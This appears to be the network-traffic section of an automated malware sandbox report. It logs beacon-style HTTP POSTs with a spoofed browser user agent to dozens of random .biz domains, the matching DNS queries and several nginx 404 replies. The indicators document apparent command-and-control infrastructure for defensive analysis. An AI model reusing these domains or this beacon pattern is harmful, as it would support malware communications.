Source: global trafficHTTP traffic detected: POST /tqiopufncd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bghjpy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /fv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: damcprvgv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /cly HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ocsvqjg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /rsijdbfgctvawkab HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ywffr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ecxbwt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /myqrw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pectx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /bf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zyiexezl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /oluilwxotdxeiqq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: banwyw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ajifdwkq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /exoigpwxtw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /vhkxrtp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zrlssa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /chcelg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jlqltsjvh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /vwhigqqruvsekwy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xyrgy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /gsepgks HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xyrgy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /mswwap HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /raodt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /x HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kvbjaur.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /yfvdkcw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uphca.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /yjhdmcatglnakd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fjumtfnz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ujivskprejscmpv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fjumtfnz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /m HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hlzfuyy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /yamkuqcyqisosmtq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rffxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
Source: global trafficDNS traffic detected: DNS query: przvgke.biz
Source: global trafficDNS traffic detected: DNS query: zlenh.biz
Source: global trafficDNS traffic detected: DNS query: knjghuig.biz
Source: global trafficDNS traffic detected: DNS query: uhxqin.biz
Source: global trafficDNS traffic detected: DNS query: anpmnmxo.biz
Source: global trafficDNS traffic detected: DNS query: lpuegx.biz
Source: global trafficDNS traffic detected: DNS query: vjaxhpbji.biz
Source: global trafficDNS traffic detected: DNS query: xlfhhhm.biz
Source: global trafficDNS traffic detected: DNS query: ifsaia.biz
Source: global trafficDNS traffic detected: DNS query: saytjshyf.biz
Source: global trafficDNS traffic detected: DNS query: vcddkls.biz
Source: global trafficDNS traffic detected: DNS query: fwiwk.biz
Source: global trafficDNS traffic detected: DNS query: tbjrpv.biz
Source: global trafficDNS traffic detected: DNS query: deoci.biz
Source: global trafficDNS traffic detected: DNS query: gytujflc.biz
Source: global trafficDNS traffic detected: DNS query: qaynky.biz
Source: global trafficDNS traffic detected: DNS query: bumxkqgxu.biz
Source: global trafficDNS traffic detected: DNS query: dwrqljrr.biz
Source: global trafficDNS traffic detected: DNS query: nqwjmb.biz
Source: global trafficDNS traffic detected: DNS query: ytctnunms.biz
Source: global trafficDNS traffic detected: DNS query: myups.biz
Source: global trafficDNS traffic detected: DNS query: oshhkdluh.biz
Source: global trafficDNS traffic detected: DNS query: yunalwv.biz
Source: global trafficDNS traffic detected: DNS query: jpskm.biz
Source: global trafficDNS traffic detected: DNS query: lrxdmhrr.biz
Source: global trafficDNS traffic detected: DNS query: wllvnzb.biz
Source: global trafficDNS traffic detected: DNS query: gnqgo.biz
Source: global trafficDNS traffic detected: DNS query: jhvzpcfg.biz
Source: global trafficDNS traffic detected: DNS query: acwjcqqv.biz
Source: global trafficDNS traffic detected: DNS query: lejtdj.biz
Source: global trafficDNS traffic detected: DNS query: vyome.biz
Source: global trafficDNS traffic detected: DNS query: yauexmxk.biz
Source: global trafficDNS traffic detected: DNS query: iuzpxe.biz
Source: global trafficDNS traffic detected: DNS query: sxmiywsfv.biz
Source: global trafficDNS traffic detected: DNS query: vrrazpdh.biz
Source: global trafficDNS traffic detected: DNS query: ftxlah.biz
Source: global trafficDNS traffic detected: DNS query: typgfhb.biz
Source: global trafficDNS traffic detected: DNS query: esuzf.biz
Source: global trafficDNS traffic detected: DNS query: gvijgjwkh.biz
Source: global trafficDNS traffic detected: DNS query: qpnczch.biz
Source: global trafficDNS traffic detected: DNS query: brsua.biz
Source: global trafficDNS traffic detected: DNS query: dlynankz.biz
Source: global trafficDNS traffic detected: DNS query: oflybfv.biz
Source: global trafficDNS traffic detected: DNS query: yhqqc.biz
Source: global trafficDNS traffic detected: DNS query: mnjmhp.biz
Source: global trafficDNS traffic detected: DNS query: opowhhece.biz
Source: global trafficDNS traffic detected: DNS query: zjbpaao.biz
Source: global trafficDNS traffic detected: DNS query: jdhhbs.biz
Source: global trafficDNS traffic detected: DNS query: mgmsclkyu.biz
Source: global trafficDNS traffic detected: DNS query: warkcdu.biz
Source: global trafficDNS traffic detected: DNS query: gcedd.biz
Source: global trafficDNS traffic detected: DNS query: jwkoeoqns.biz
Source: global trafficDNS traffic detected: DNS query: xccjj.biz
Source: global trafficDNS traffic detected: DNS query: hehckyov.biz
Source: global trafficDNS traffic detected: DNS query: rynmcq.biz
Source: global trafficDNS traffic detected: DNS query: uaafd.biz
Source: global trafficDNS traffic detected: DNS query: eufxebus.biz
Source: global trafficDNS traffic detected: DNS query: pwlqfu.biz
Source: global trafficDNS traffic detected: DNS query: rrqafepng.biz
Source: global trafficDNS traffic detected: DNS query: ctdtgwag.biz
Source: global trafficDNS traffic detected: DNS query: tnevuluw.biz
Source: global trafficDNS traffic detected: DNS query: whjovd.biz
Source: global trafficDNS traffic detected: DNS query: gjogvvpsf.biz
Source: global trafficDNS traffic detected: DNS query: reczwga.biz
Source: global trafficDNS traffic detected: DNS query: bghjpy.biz
Source: global trafficDNS traffic detected: DNS query: damcprvgv.biz
Source: global trafficDNS traffic detected: DNS query: ocsvqjg.biz
Source: global trafficDNS traffic detected: DNS query: ywffr.biz
Source: global trafficDNS traffic detected: DNS query: ecxbwt.biz
Source: global trafficDNS traffic detected: DNS query: pectx.biz
Source: global trafficDNS traffic detected: DNS query: zyiexezl.biz
Source: global trafficDNS traffic detected: DNS query: banwyw.biz
Source: global trafficDNS traffic detected: DNS query: muapr.biz
Source: global trafficDNS traffic detected: DNS query: wxgzshna.biz
Source: global trafficDNS traffic detected: DNS query: zrlssa.biz
Source: global trafficDNS traffic detected: DNS query: jlqltsjvh.biz
Source: global trafficDNS traffic detected: DNS query: xyrgy.biz
Source: global trafficDNS traffic detected: DNS query: htwqzczce.biz
Source: global trafficDNS traffic detected: DNS query: kvbjaur.biz
Source: global trafficDNS traffic detected: DNS query: uphca.biz
Source: global trafficDNS traffic detected: DNS query: fjumtfnz.biz
Source: global trafficDNS traffic detected: DNS query: hlzfuyy.biz
Source: global trafficDNS traffic detected: DNS query: rffxu.biz
Source: global trafficDNS traffic detected: DNS query: cikivjto.biz
Source: unknownHTTP traffic detected: POST /tqhhuuvd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 798
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 28 Oct 2024 15:37:43 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 28 Oct 2024 15:37:43 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 28 Oct 2024 15:37:53 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
